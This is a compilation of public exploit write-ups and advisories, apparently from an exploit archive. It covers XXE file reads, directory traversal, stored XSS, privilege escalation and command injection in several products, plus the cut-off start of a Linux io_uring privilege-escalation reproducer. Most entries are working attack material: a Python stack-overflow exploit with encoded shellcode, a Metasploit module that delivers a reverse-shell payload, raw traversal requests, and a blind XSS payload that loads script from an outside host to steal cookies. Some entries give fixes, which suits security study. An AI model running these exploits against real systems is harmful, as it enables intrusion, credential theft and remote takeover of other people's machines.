nt!KeBugCheckEx # Mitigation Update to Lenovo Power Management driver version 1.67.17.48 or higher
-
Apache Olingo OData 4.0 - XML External Entity Injection
############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: Apache Olingo OData 4.0 # Vendor: Apache Foundation # CSNC ID: CSNC-2019-025 # CVE ID: CVE-2019-17554 # Subject: XML External Entity Resolution (XXE) # Risk: High # Effect: Remotely exploitable # Author: Archibald Haddock (advisories@compass-security.com) # Date: 08.11.2019 # ############################################################# Introduction: ------------- Apache Olingo is a Java library that implements the Open Data Protocol (OData). [1] XML data is parsed by insecurely configured software components, which can be abused for XML External Entity (XXE) attacks [2]. Affected: --------- Vulnerable: * Olingo OData 4.x.x to 4.6.x Not vulnerable: * Olingo OData 4.7.0 * The Olingo OData 2.0 implementation has XXE protection since 1.1.0-RC01 Technical Description --------------------- The XML content type entity deserializer is not configured to deny the resolution of external entities. Requests with content type "application/xml" that trigger the deserialization of entities can therefore be used to mount XXE attacks (in the example below, an unauthenticated POST reads /etc/passwd and returns its content in the created entity). 
Request ====== POST /odata-server-sample/cars.svc/Cars HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost:8081/odata-server-sample/ Cookie: JSESSIONID=17C3158153CDC2CA1DBA0E77D4AFC3B0 Upgrade-Insecure-Requests: 1 content-type: application/xml Content-Length: 1101 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars/$entity"> <a:id>Cars(1)</a:id> <a:title></a:title> <a:summary></a:summary> <a:updated>2019-11-08T15:10:30Z</a:updated> <a:author> <a:name></a:name> </a:author> <a:link rel="edit" href="Cars(1)"></a:link> <a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link> <a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category> <a:content type="application/xml"> <m:properties> <d:Id m:type="Int16">1</d:Id> <d:Model>F1 &xxe;</d:Model> <d:ModelYear>2012</d:ModelYear> <d:Price m:type="Decimal">189189.43</d:Price> <d:Currency>EUR</d:Currency> </m:properties> </a:content> </a:entry> Response ======== HTTP/1.1 201 Created Server: Apache-Coyote/1.1 OData-Version: 4.0 Content-Type: application/xml Content-Length: 960 Date: Fri, 08 Nov 2019 14:22:35 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?><a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" 
m:context="$metadata#Cars"><a:id>Cars(1)</a:id><a:title></a:title><a:summary></a:summary><a:updated>2019-11-08T15:22:35Z</a:updated><a:author><a:name></a:name></a:author><a:link rel="edit" href="Cars(1)"></a:link><a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link><a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category><a:content type="application/xml"><m:properties><d:Id m:type="Int16">1</d:Id><d:Model> myuser:x:1000:1000:,,,:/home/myuser:/bin/bash </d:Model><d:ModelYear>2012</d:ModelYear><d:Price m:type="Decimal">189189.43</d:Price><d:Currency>EUR</d:Currency></m:properties></a:content></a:entry> Workaround / Fix: ----------------- Configure the XML reader securely [3]. In org.apache.olingo.server.core.deserializer.xml.ODataXmlDeserializer.java on line 70 a javax.xml.stream.XMLInputFactory is instantiated: private static final XMLInputFactory FACTORY = XMLInputFactory.newFactory(); The XMLInputFactory should be configured not to resolve external entities: FACTORY.setProperty(XMLInputFactory.SUPPORT_DTD, false); FACTORY.setProperty("javax.xml.stream.isSupportingExternalEntities", false); Setting SUPPORT_DTD to false is the primary control: it rejects the DOCTYPE/ENTITY declarations entirely, which also blocks DTD-based entity-expansion denial of service (see [3]); the second property is defence in depth. Apply the same configuration to any other XMLInputFactory that parses client-supplied XML, not only to this deserializer. Timeline: --------- 2019-11-08: Discovery by Compass Security 2019-11-08: Initial vendor notification 2019-11-08: Initial vendor response 2019-12-04: Release of fixed Version / Patch [4] 2019-12-05: Coordinated public disclosure date [1] https://olingo.apache.org/ [2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing [3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html [4] https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E Source: https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2019-025_apache_xxe.txt
-
FTP Commander Pro 8.03 - Local Stack Overflow
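# Exploit Title: FTP Commander Pro 8.03 - Local Stack Overflow
# Date: 2019-12-12
# Exploit Author: boku
# Discovered by: UN_NON
# Original DoS: FTP Commander 8.02 - Overwrite (SEH)
# Original DoS Link: https://www.exploit-db.com/exploits/37810
# Software Vendor: http://www.internet-soft.com/
# Software Link: http://www.internet-soft.com/DEMO/cftpsetup.exe
# Version: Version 8.03 & Version 8.02 (same exploit for both)
# Tested on: Windows 10 Home 1909 (64-bit; OS-build=18363.418)
#            Windows 10 Education 1909 (32-bit; OS-build=18363.418)
#            Windows 10 Pro 1909 (32-bit; OS-build=18363.418)
#            Windows Vista Home Basic SP1 (6.0.6001 Build 6001)
#            Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600
# Python Version: Python 2.7.16+ (the generator below also runs unchanged under Python 3)
# Recreate:
# 1) Generate 'poc.txt' payload using python 2.7.x
# 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy
# 3) Install & Open ftpCommander v8.03 (or v8.02)
# 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command
#    - A textbox will appear on the bottom of the right window
# 5) Paste payload from generated txt file into textbox
# 6) Click "Do it"
#    - The program will crash & calculator will open
# Other Security Issue:
# - The program's default install path is: C:\cftp\cftp.exe
#!/usr/bin/python

blt = '\033[92m[\033[0m+\033[92m]\033[0m '  # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m '  # bash red error bullet

# Buffer layout (offsets as measured by the original author):
#   [nops] [shellcode] [filler 'B' up to EIP_OFFSET] [3-byte EIP overwrite]
# EIP is overwritten at offset 4108. Exceeding 4112 bytes additionally
# overwrites nSEH/SEH, so the total input is kept at exactly 4111 bytes.
EIP_OFFSET = 4108

# 1000 printable bytes used as the NOP sled ("ASCII friendly nops"). The
# EIP jump lands at the beginning of the buffer, i.e. at the top of this sled.
nops = b'CGS[BOKU]J' * 100

# Shellcode may be up to EIP_OFFSET bytes in total by shrinking the sled and
# replacing the payload. Generated with:
# msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper
# x86/alpha_upper succeeded with size 447 (iteration=0)
shellcode = b""
shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49"
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50"
shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39"
shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b"
shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c"
shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a"
shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33"
shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31"
shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b"
shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50"
shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32"
shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31"
shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48"
shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a"
shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e"
shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43"
shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b"
shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c"
shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36"
shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35"
shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b"
shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56"
shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a"
shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50"
shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d"
shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33"
shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31"
shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f"
shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38"
shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59"
shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50"
shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51"
shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50"
shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42"
shellcode += b"\x4c\x32\x43\x53\x30\x41\x41"

# Guard against a replacement payload that no longer fits in front of EIP;
# a negative repeat count would otherwise silently yield an empty filler and
# a misaligned overwrite.
if len(nops) + len(shellcode) > EIP_OFFSET:
    raise SystemExit(err + 'nops + shellcode exceed the EIP offset (' + str(EIP_OFFSET) + ' bytes)')

# Fill the rest of the space with B's until we are at our EIP offset
offset = b'\x42' * (EIP_OFFSET - len(nops + shellcode))

# The EAX register holds a pointer to the beginning of our buffer, so a
# `jmp [eax]` gadget (FF 20) returns execution to the top of the NOP sled.
# !mona find -o -s '\xFF\x20'
# 0x0041081a : '\xFF\x20' | startnull,ascii {PAGE_EXECUTE_READ} [ftpcomm.exe]
# | ASLR: False; Rebase: False; SafeSEH: False;
# Only the low 3 bytes are written so that EIP ends up starting with 0x00
# without having to place a NUL byte in the pasted input.
eip = b'\x1a\x08\x41'

payload = nops + shellcode + offset + eip

File = 'poc.txt'
try:
    # Binary mode: the decoder stub contains bytes > 0x7f and the file must be
    # written byte-for-byte, without newline translation or a text encoding.
    with open(File, 'wb') as f:
        f.write(payload)
    print(blt + File + " created successfully ")
except (IOError, OSError) as e:
    # Report the reason instead of swallowing it with a bare except.
    print(err + File + ' failed to create')
    print(err + str(e))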
-
NVMS 1000 - Directory Traversal
# Title: NVMS-1000 - Directory Traversal # Date: 2019-12-12 # Author: Numan Türle # Vendor Homepage: http://en.tvt.net.cn/ # Version : N/A # Software Link : http://en.tvt.net.cn/products/188.html POC --------- GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 12.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close Response --------- ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1
-
Bullwark Momentum Series JAWS 1.0 - Directory Traversal
# Title: Bullwark Momentum Series JAWS 1.0 - Directory Traversal # Date: 2019-12-11 # Author: Numan Türle # Vendor Homepage: http://www.bullwark.net/ # Version : Bullwark Momentum Series Web Server JAWS/1.0 # Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 POC --------- GET /../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: 12.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close Response --------- root:ABgia2Z.lfFhA:0:0::/root:/bin/sh
-
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)
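class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'OpenNetAdmin Ping Command Injection',
      'Description'    => %q{
        This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.
      },
      'Author'         => [
        'mattpascoe',                # Vulnerability discovery
        'Onur ER <onur@onurer.net>'  # Metasploit module
      ],
      'References'     => [
        ['EDB', '47691']
      ],
      'DisclosureDate' => '2019-11-19',
      'License'        => MSF_LICENSE,
      'Platform'       => 'linux',
      'Arch'           => [ARCH_X86, ARCH_X64],
      'Privileged'     => false,
      'Targets'        => [
        ['Automatic Target', {}]
      ],
      'DefaultOptions' => {
        'RPORT'   => 80,
        'payload' => 'linux/x86/meterpreter/reverse_tcp'
      },
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('VHOST', [false, 'HTTP server virtual host']),
        OptString.new('TARGETURI', [true, 'Base path', '/ona/login.php'])
      ]
    )
  end

  # Fingerprint the target through the unauthenticated xajax "about" dialog,
  # whose response carries the product banner and version string.
  #
  # Returns CheckCode::Unknown when no response is received, ::Safe when the
  # banner is absent, ::Appears when the parsed version lies in the affected
  # range, and ::Detected when the banner is present but the version is
  # missing or outside the range.
  def check
    res = send_request_cgi({
      'method'        => 'POST',
      'uri'           => normalize_uri(target_uri.path),
      'ctype'         => 'application/x-www-form-urlencoded',
      'encode_params' => false,
      'vars_post'     => {
        'xajax'       => 'window_open',
        'xajaxargs[]' => 'app_about'
      }
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    return CheckCode::Safe unless res.body =~ /OpenNetAdmin/i

    opennetadmin_version = res.body.scan(/OpenNetAdmin - v([\d\.]+)/).flatten.first

    # Banner seen but no parsable version string: do not claim the range.
    return CheckCode::Detected unless opennetadmin_version

    # Bug fix: the original passed the literal 'opennetadmin_version' to
    # Gem::Version.new, which raises ArgumentError on a malformed version
    # string and so made check() fail on every target.
    version = Gem::Version.new(opennetadmin_version)
    vprint_status "OpenNetAdmin version #{version}"

    if version >= Gem::Version.new('8.5.14') && version <= Gem::Version.new('18.1.1')
      return CheckCode::Appears
    end

    CheckCode::Detected
  end

  # Deliver the payload with the printf command stager; each stager line is
  # passed through execute_command below.
  def exploit
    print_status('Exploiting...')
    execute_cmdstager(flavor: :printf)
  end

  # Rewrite "chmod +x" to "chmod 777". The command is interpolated into a
  # form-encoded body with encoding disabled, so a literal '+' would
  # presumably be decoded as a space by the target and break the stager.
  # Use the non-destructive gsub: gsub! returns nil when nothing matched, which
  # would have interpolated an empty command for every stager line that does
  # not contain "chmod +x".
  def filter_bad_chars(cmd)
    cmd.gsub(/chmod \+x/, 'chmod 777')
  end

  # Inject `cmd` into the ping tooltip handler via the xajax "ip=>;<cmd>;"
  # argument. The command is sent unencoded (encode_params is false), so it
  # must not contain characters that are special in a form body such as
  # '&', '+' or '%'; the printf stager flavor satisfies this once the
  # "chmod +x" line is rewritten by filter_bad_chars.
  def execute_command(cmd, opts = {})
    post_data = "xajax=window_submit&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;#{filter_bad_chars(cmd)};&xajaxargs[]=ping"

    begin
      send_request_cgi({
        'method'        => 'POST',
        'uri'           => normalize_uri(target_uri.path),
        'ctype'         => 'application/x-www-form-urlencoded',
        'encode_params' => false,
        'data'          => post_data
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end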
-
D-Link DIR-615 Wireless Router - Persistent Cross-Site Scripting
# Exploit Title: D-Link DIR-615 Wireless Router - Persistent Cross-Site Scripting # Date: 2019-12-13 # Exploit Author: Sanyam Chawla # Vendor Homepage: http://www.dlink.co.in # Category: Hardware (Wi-fi Router) # Hardware Link: http://www.dlink.co.in/products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019-19742 Reproduction Steps: 1. Log in to your Wi-Fi router gateway with admin credentials [e.g. http://192.168.0.1] 2. Go to the Maintenance page and click on Admin in the left panel 3. Put a blind XSS payload into the name field: "><script src=https://ptguy.xss.ht></script>. This payload is saved by the server and reflected in the user page. 4. On every refresh of the user home page, the blind XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker. 5. For HTML injection just put <b> Testing </b> in the username field; the username is then rendered in bold on your homepage. #Burp Intercept POST /form2userconfig.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 180 Origin: http://192.168.0.1 Connection: close Referer: http://192.168.0.1/userconfig.htm Cookie: SessionID= Upgrade-Insecure-Requests: 1 username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send
-
D-Link DIR-615 - Privilege Escalation
# Exploit Title: D-Link DIR-615 - Privilege Escalation # Date: 2019-12-10 # Exploit Author: Sanyam Chawla # Vendor Homepage: http://www.dlink.co.in # Category: Hardware (Wi-fi Router) # Hardware Link: http://www.dlink.co.in/products/?pid=678 # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux # CVE: CVE-2019-19743 # Reproduction Steps: # Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1] # Go to the Maintenance page and click on Admin on the left panel. # There is an option to create a user and by default, it shows only user accounts. # Create an account with a name(i.e ptguy) and change the privileges from user to root(admin) # by changing privileges id (1 to 2) with burp suite. # Privilege Escalation Post Request POST /form2userconfig.cgi HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 122 Origin: http://192.168.0.1 Connection: close Referer: http://192.168.0.1/userconfig.htm Cookie: SessionID= Upgrade-Insecure-Requests: 1 username=ptguy&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send # Now log in with newly created root (ptguy) user. You have all administrator rights.
-
Roxy Fileman 1.4.5 - Directory Traversal
# Exploit Title: Roxy Fileman 1.4.5 - Directory Traversal # Author: Patrik Lantz # Date: 2019-12-06 # Software: Roxy Fileman # Version: 1.4.5 # Vendor Homepage: http://www.roxyfileman.com/ # Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net # CVE: CVE-2019-19731 Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134 (using custom account as application pool identity for the IIS worker process). =========================== Description =========================== Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal which can lead to file write in arbitrary locations depending on the IIS worker process privileges. This PoC demonstrates a crafted Windows shortcut file being uploaded and written to the Startup folder. The execution of this file will be triggered on the next login. Proof of Concept =========================== It's possible to write an uploaded file to arbitrary locations using the RENAMEFILE action. The RenameFile function in main.ashx does not check if the new file name 'name' is a valid location. Moreover, the default conf.json has an incomplete blacklist for file extensions which in this case allows Windows shortcut files to be uploaded, alternatively existing files can be renamed to include the .lnk extension. 1) Create a shortcut file By using for example the target executable C:\Windows\System32\Calc.exe Remove the .lnk extension and rename it to use the .dat extension. 2) Upload the file Either upload the .dat file manually via the Roxy Fileman web interface or programmatically using a HTTP POST request. 
Details of the request: POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1 Host: 127.0.0.1:50357 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------159382831523528 Content-Length: 924 Origin: http://127.0.0.1:50357 Connection: close Referer: http://127.0.0.1:50357/wwwroot/fileman/ Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list -----------------------------159382831523528 Content-Disposition: form-data; name="action" upload -----------------------------159382831523528 Content-Disposition: form-data; name="method" ajax -----------------------------159382831523528 Content-Disposition: form-data; name="d" /wwwroot/fileman/Uploads/test2 -----------------------------159382831523528 Content-Disposition: form-data; name="files[]"; filename="poc.dat" Content-Type: application/octet-stream ...data omitted... -----------------------------159382831523528-- 3) Write the file to the Startup folder using the RENAMEFILE action The new filename is set via the n parameter. The correct path can be identified by trial and error depending on the location of wwwroot on the filesystem and the privileges for the IIS worker process (w3wp.exe). If the necessary directories do not exist, they can be created using the CREATEDIR action which also is vulnerable to path traversal. 
POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1 Host: 127.0.0.1:50357 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 66 Origin: http://127.0.0.1:50357 Connection: close Referer: http://127.0.0.1:50357/wwwroot/fileman/ Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat Workaround / Fix: =========================== Patch the main.ashx code so that every path used by the CREATEDIR, COPYFILE and RENAMEFILE actions is canonicalized and verified to remain inside the configured upload root before it is used. Recommendations for users of Roxy Fileman: - Add the lnk file extension to conf.json under FORBIDDEN_UPLOADS, and also aspx, since it is not included in the blacklist by default. Note that an extension blacklist is inherently incomplete; an allowlist of permitted extensions is the more robust control. Timeline =========================== 2019-12-06: Discovered the vulnerability 2019-12-06: Reported to the vendor (vendor is unresponsive) 2019-12-11: Request CVE 2019-12-13: Advisory published Discovered By: =========================== Patrik Lantz
-
Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting
# Exploit Title: Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting # Date: 2019-12-17 # Exploit Author: MTK # Vendor Homepage: https://sweethawk.co/zendesk/survey-app # Software Link: https://www.zendesk.com/apps/support/survey/ # Version: Up to v1.6 # Tested on: Zendesk - Firefox/Windows # Software description: # Sweet Hawk Survey app ask customers for a 0-10 score instead of the normal good or bad question. # You can get more granular satisfaction data without compromising the response rate. # Ask an optional NPS question on the landing page. View reports and drill down into the response # detail and go directly to the ticket. Easy to set up, just replace the survey place holder in # your trigger or automation. Customize the landing pages for each of your brands. # Technical Details & Impact: # Attackers use vulnerable web pages to inject malicious code and have it stored on the web server # for later use. The payload is automatically served to users who browse web pages and executed in # their context. Thus, the victims do not need to click on a malicious link to run the payload. # All they have to do is visit a vulnerable web page. # POC 1. Open Support ticket in Zendesk and send XSS payload e.g; <script>alert(1);</script> 2. Generate survey request to rate the ticket and payload will execute; # Time line 09-19-2019 - Vulnerability discovered 09-20-2019 - Vendor contacted 12-02-2019 - Detailed report shared and full disclosure time line given with no response 12-17-2019 - Full Disclosure
Linux 5.3 - Privilege Escalation via io_uring Offload of sendmsg() onto Kernel Thread with Kernel Creds
Since commit 0fa03c624d8f ("io_uring: add support for sendmsg()", first in v5.3), io_uring has support for asynchronously calling sendmsg(). Unprivileged userspace tasks can submit IORING_OP_SENDMSG submission queue entries, which cause sendmsg() to be called either in syscall context in the original task, or - if that wasn't able to send a message without blocking - on a kernel worker thread. The problem is that sendmsg() can end up looking at the credentials of the calling task for various reasons; for example: - sendmsg() with non-null, non-abstract ->msg_name on an unconnected AF_UNIX datagram socket ends up performing filesystem access checks - sendmsg() with SCM_CREDENTIALS on an AF_UNIX socket ends up looking at process credentials - sendmsg() with non-null ->msg_name on an AF_NETLINK socket ends up performing capability checks against the calling process When the request has been handed off to a kernel worker task, all such checks are performed against the credentials of the worker - which are default kernel creds, with UID 0 and full capabilities. To force io_uring to hand off a request to a kernel worker thread, an attacker can abuse the fact that the opcode field of the SQE is read multiple times, with accesses to the struct msghdr in between: The attacker can first submit an SQE of type IORING_OP_RECVMSG whose struct msghdr is in a userfaultfd region, and then, when the userfaultfd triggers, switch the type to IORING_OP_SENDMSG. 
Here's a reproducer for Linux 5.3 that demonstrates the issue by adding an IPv4 address to the loopback interface without having the required privileges for that: ========================================================================== $ cat uring_sendmsg.c #define _GNU_SOURCE #include <pthread.h> #include <unistd.h> #include <stdio.h> #include <err.h> #include <sys/mman.h> #include <sys/syscall.h> #include <sys/socket.h> #include <sys/un.h> #include <sys/ioctl.h> #include <linux/rtnetlink.h> #include <linux/if_addr.h> #include <linux/io_uring.h> #include <linux/userfaultfd.h> #include <linux/netlink.h> #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1) \ err(1, "SYSCHK(" #x ")"); \ __res; \ }) static int uffd = -1; static struct iovec *iov; static struct iovec real_iov; static struct io_uring_sqe *sqes; static void *uffd_thread(void *dummy) { struct uffd_msg msg; int res = SYSCHK(read(uffd, &msg, sizeof(msg))); if (res != sizeof(msg)) errx(1, "uffd read"); printf("got userfaultfd message\n"); sqes[0].opcode = IORING_OP_SENDMSG; union { struct iovec iov; char pad[0x1000]; } vec = { .iov = real_iov }; struct uffdio_copy copy = { .dst = (unsigned long)iov, .src = (unsigned long)&vec, .len = 0x1000 }; SYSCHK(ioctl(uffd, UFFDIO_COPY, ©)); return NULL; } int main(void) { // initialize uring struct io_uring_params params = { }; int uring_fd = SYSCHK(syscall(SYS_io_uring_setup, /*entries=*/10, ¶ms)); unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING)); unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING)); sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES)); // prepare userfaultfd-trapped IO vector page iov = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)); uffd = SYSCHK(syscall(SYS_userfaultfd, 0)); struct uffdio_api api = { .api = UFFD_API, 
